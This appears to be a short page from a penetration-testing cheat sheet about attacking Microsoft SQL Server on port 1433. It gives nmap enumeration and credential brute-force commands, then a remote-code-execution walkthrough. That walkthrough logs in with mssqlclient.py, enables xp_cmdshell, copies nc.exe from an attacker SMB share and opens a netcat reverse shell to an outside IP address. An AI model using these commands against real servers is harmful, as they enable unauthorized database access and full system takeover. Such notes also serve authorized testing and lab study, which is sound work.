search

MsSQL (Port 1433)

hashtag
Quick Intro

Microsoft SQL Server is a relational database management systemarrow-up-right developed by Microsoftarrow-up-right. As a database serverarrow-up-right, it is a software productarrow-up-right with the primary function of storing and retrieving data as requested by other software applicationsarrow-up-right—which may run either on the same computer or on another computer across a network (including the Internet).

hashtag
Nmap Scripts

nmap -n -v -sV -Pn -p 1433 –script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password $ip

hashtag
BruteForce

nmap -n -v -sV -Pn -p 1433 –script ms-sql-brute –script-args userdb=users.txt,passdb=passwords.txt $ip

hashtag
RCE with SQL Server

  • We can use mssql.py to login and execute the commands

mssqlclient.py <domain>/<username>:<password>@$ip

mssqlclient.py bathry/admin:pss123@192.168.11.15

  • Enabled Code execution

  • Copied the Nishang reverse shell to current directory and added localhost and port to it and start hosting server

SQL> enable_xp_cmdshell

SQL> xp_cmdshell copy \\10.10.16.26\gabbar\nc.exe %temp%\nc.exe

SQL> xp_cmdshell %temp%/nc.exe -e cmd.exe 10.10.16.26 4444
PreviousOracle (Port 1521)NextWeb Scanning

Last updated